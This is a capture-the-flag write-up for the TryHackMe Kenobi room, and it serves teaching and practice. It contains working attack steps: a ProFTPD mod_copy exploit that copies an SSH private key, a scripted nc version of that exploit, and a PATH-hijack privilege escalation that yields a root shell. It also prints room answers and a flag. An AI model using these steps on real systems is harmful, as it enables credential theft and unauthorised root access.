THM — Kenobi Writeup

Nmap, smbclient, exploitdb, ssh, $PATH

Yikai
10 min read · Nov 11, 2020

https://tryhackme.com/room/kenobi

Deploy the vulnerable machine

Nmap scan: $ nmap -T4 -A 10.10.88.100

(-A turns on OS detection, version detection, the default NSE scripts and traceroute. Without -p- this only covers nmap's 1000 most common TCP ports, which is why "Not shown: 993 closed ports" plus the 7 open ports below adds up to 1000.)

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:36 EST
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 52145/tcp6 mountd
| 100005 1,2,3 52209/udp6 mountd
| 100005 1,2,3 53083/tcp mountd
| 100005 1,2,3 60946/udp mountd
| 100021 1,3,4 34275/tcp nlockmgr
| 100021 1,3,4 36852/udp nlockmgr
| 100021 1,3,4 40952/udp6 nlockmgr
| 100021 1,3,4 43819/tcp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2020-11-11T00:37:33-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-11T06:37:33
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.83 seconds

Scan the machine with nmap, how many ports are open?

Ans: 7

Enumerating Samba for shares

Enumerating shares with nmap:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.88.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:45 EST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 50.00% done; ETC: 01:46 (0:00:21 remaining)
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.88.100\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.88.100\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.88.100\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 53.50 seconds

Using the nmap command above, how many shares have been found?

Ans: 3

Next, inspect the anonymous share with smbclient:

smbclient //10.10.88.100/anonymous

When prompted for a password, just hit enter (or pass -N to skip the prompt entirely); the share allows anonymous access, as the nmap output above already shows.

Type help to list the commands smbclient supports.

kali@kali:~$ smbclient //10.10.88.100/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!

Once you're connected, list the files on the share. What file can you see?

List out the files on the share using the command: $ ls

smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877104 blocks available

Ans: log.txt

Download it with: $ get log.txt

and read it on your local machine. This file is where the later steps get the user the FTP server runs as and the location of kenobi's ssh private key.

What port is FTP running on?

Ans: 21

Next, let’s enumerate port 111: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.88.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:09 EST
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 3.28 seconds

What mount can we see?

Ans:/var

Gain initial access with ProFtpd

Using netcat to connect to the machine on the FTP port, where FTP is port 21: $ nc 10.10.88.100 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.88.100]

What is the version?

Ans: 1.3.5

Use searchsploit to search for exploits.

How many exploits are there for the ProFTPd running?

Ans:3

From log.txt we know the FTP server runs as the kenobi user, and the ssh-keygen transcript in the same file tells us where that user's private key is:

“Your identification has been saved in /home/kenobi/.ssh/id_rsa”

The relevant searchsploit hit is "ProFTPd 1.3.5 - File Copy" (36742.txt): the mod_copy module in this version accepts the SITE CPFR (copy from) and SITE CPTO (copy to) commands from unauthenticated clients (CVE-2015-3306). The copy is performed by the server process itself, so anything the kenobi user can read can be copied to anywhere the kenobi user can write, without ever logging in.

First we name the source file:

$ site cpfr /home/kenobi/.ssh/id_rsa

Earlier, enumerating port 111, we saw that /var is exported over NFS to everyone (*). /var/tmp is world-writable, so it is a destination the FTP process can write to and that we can then read through an NFS mount:

$ site cpto /var/tmp/id_rsa

This copies id_rsa from /home/kenobi/.ssh/ to /var/tmp/ (it is a copy, not a move; the original key stays in place).

*My THM box IP expired, the new IP address is: 10.10.93.173

kali@kali:~$ nc 10.10.93.173 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.173]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful
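The same exchange, scripted, as an added example that is not part of the original write-up: it sends the SITE CPFR / SITE CPTO pair to port 21 and checks the reply codes instead of eyeballing them in nc. The command words, paths and the 350 / 250 replies come from the transcript above; the 5 second timeout and the uppercase spelling of the commands (FTP is case-insensitive) are choices of this example.

```sh
#!/bin/sh
# Added example, not part of the original write-up: script the ProFTPD
# mod_copy exchange shown above instead of typing it into nc, and check the
# reply codes. SITE CPFR / SITE CPTO, the paths and the 350 / 250 replies come
# from the transcript; the 5 second timeout is an assumption of this example.

# Command sequence sent to port 21. mod_copy handles SITE CPFR/CPTO before
# any login, so no USER/PASS lines are needed. FTP lines end in CRLF.
ftp_copy_commands() {
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Read a server transcript on stdin and report the outcome:
#   ok           350 after CPFR and 250 after CPTO were both seen
#   cpfr-failed  the source path was not accepted (no 350 reply)
#   cpto-failed  source accepted but the copy was refused (no 250 reply)
# Return status is 0 only for "ok". The patterns tolerate a trailing CR.
ftp_copy_result() {
    saw_350=0
    saw_250=0
    while IFS= read -r line; do
        case "$line" in
            350*)        saw_350=1 ;;
            "250 Copy"*) saw_250=1 ;;
        esac
    done
    if [ "$saw_350" -eq 1 ] && [ "$saw_250" -eq 1 ]; then
        echo ok
        return 0
    elif [ "$saw_350" -eq 0 ]; then
        echo cpfr-failed
        return 1
    else
        echo cpto-failed
        return 1
    fi
}

# Live run against a host, e.g.
#   ftp_copy 10.10.93.173 /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa
ftp_copy() {
    ftp_copy_commands "$2" "$3" | nc -w 5 "$1" 21 | ftp_copy_result
}
```

ftp_copy exits non-zero when either step is refused, so it can be chained with the NFS mount step only when the copy actually landed.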

Next, mount the exported /var directory on our machine (mounting read-only is enough, since we only need to read the copied key):

kali@kali:~$ sudo mkdir /mnt/kenobiNFS
kali@kali:~$ sudo mount 10.10.93.173:/var /mnt/kenobiNFS
kali@kali:~$ ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Nov 11 02:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Nov 11 02:51 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www

We have successfully mounted the remote /var on our machine over NFS.

Let's grab the key.

Using the command: $ cp /mnt/kenobiNFS/tmp/id_rsa .

copies the key into the current directory on kali.

Remember to chmod 600 id_rsa before using it; otherwise ssh refuses the key with a "permissions are too open" / "UNPROTECTED PRIVATE KEY FILE" warning.

Now, with this RSA key, we can ssh into kenobi’s account using the command:

$ ssh -i id_rsa kenobi@10.10.93.173

Nice, we now have an ssh session as the kenobi user.

Let’s find the user flag.

kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

What is Kenobi’s user flag (/home/kenobi/user.txt)?

Ans: d0b0f3f53b6caa532a83915e19224899

Privilege Escalation with Path Variable Manipulation

With the following command we can search the filesystem for setuid binaries (-perm -u=s matches files with the setuid bit; -perm -4000 is the numeric equivalent; 2>/dev/null hides the permission errors from directories we cannot read):

find / -perm -u=s -type f 2>/dev/null

What file looks particularly out of the ordinary?

Ans: /usr/bin/menu
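The find command lists every setuid file on the box, and the odd one only stands out if you know what a stock Ubuntu install carries. As an added example (not part of the original write-up), the script below compares the find output against a known-good list so that an extra entry such as /usr/bin/menu is reported on its own. The baseline file format (one absolute path per line) is an assumption of this example.

```sh
#!/bin/sh
# Added example, not part of the original write-up: triage setuid binaries by
# comparing the find output against a known-good list, so an unexpected entry
# such as /usr/bin/menu stands out instead of being one line among dozens.
# The baseline file format (one absolute path per line) is an assumption.

# All setuid files under $1 (default /), sorted. -perm -4000 is the numeric
# form of the page's -perm -u=s; unreadable directories are skipped silently.
list_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null | sort
}

# Setuid files under $1 that do not appear in the baseline file $2.
# grep -x -F matches whole lines literally, so a path containing regex
# metacharacters cannot be misread as a pattern.
suid_not_in_baseline() {
    list_suid "$1" | grep -v -x -F -f "$2"
}

# Show owner and mode of the unexpected ones; on Kenobi this is where
# /usr/bin/menu would be reported.
suid_report() {
    suid_not_in_baseline "$1" "$2" | while IFS= read -r f; do
        ls -l "$f"
    done
}

# Usage on a target, with a baseline captured from a clean install of the
# same release:  suid_report / /tmp/suid-baseline.txt
```

Build the baseline once from a clean machine of the same OS release with list_suid, and keep in mind that a legitimately packaged binary can still be exploitable; the diff only tells you what was added, not what is safe.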

Let’s run this binary.

Run the binary, how many options appear?

Ans: 3

Entering each choice executes a command. Using $ strings /usr/bin/menu we can print the binary's human-readable strings; right after “Enter your choice: ” the three commands appear:

curl -I localhost
uname -r
ifconfig

Running these by hand gives the same output as choosing 1 to 3 in the menu.

Note that the commands are invoked by bare name rather than by full path (for example /usr/bin/curl), so the shell that the setuid binary spawns has to look them up in $PATH. That lookup is driven by an environment variable we control, so we can make it resolve to our own file and gain a root shell.

First, we create a file named curl in /tmp containing the single line /bin/sh. (/bin/sh on Ubuntu is dash, which keeps an elevated effective uid; bash resets the effective uid to the real uid unless started with -p, so /bin/sh is the safer choice here.)

Then we make that file executable.

Finally, we prepend /tmp to the $PATH environment variable.

If we take a look at the $PATH environmental variable now:

kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

What does all this mean?

Before, /tmp was not in $PATH; the command $ export PATH=/tmp:$PATH prepends it ahead of every other directory.

Whenever we type a command such as pwd, ls or cat, the shell searches the directories listed in $PATH (a colon-separated list, shown above) for an executable with that name.

It searches the directories in order from left to right (first /tmp, then /home/kenobi/bin, then /home/kenobi/.local/bin, and so on) and runs the first match it finds.

You can use the command: $ which to show the location of the binaries or executables.

kali@kali:~$ which pwd
/usr/bin/pwd
kali@kali:~$ which ls
/usr/bin/ls
kali@kali:~$ which cat
/usr/bin/cat

So when we run $ /usr/bin/menu and choose “1”, it runs curl; recall from $ strings /usr/bin/menu that choice “1” executes $ curl -I localhost.

The shell now searches $PATH for curl, starts with /tmp because that is the first directory, finds our fake curl there and executes it. Since /usr/bin/menu runs as root, the /bin/sh inside the fake curl runs as root too, and we get our shell.

For my own better understanding, I ran the command $ /bin/sh on my own machine.

kali@kali:/$ /bin/sh
$ pwd
/
$ whoami
kali
$ exit

Basically, when I run it, it opens a system shell, but the current user is still my default “kali” user.

Run the same command with sudo: $ sudo /bin/sh

kali@kali:/$ sudo /bin/sh
[sudo] password for kali:
# pwd
/
# whoami
root
# exit
kali@kali:/$

This time by running it with sudo, it will open a shell but as a root user.

The same thing happens in our exploit. /usr/bin/menu is setuid root, so it and the commands it spawns run with root's effective uid. Choosing “1” makes it run curl; the shell resolves curl through $PATH, finds our fake curl first, and so the /bin/sh in that file is executed as root and we get a root shell.

What is the root flag (/root/root.txt)?

Ans: 177…

You can learn more about the $PATH environmental variable here.


Yikai

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.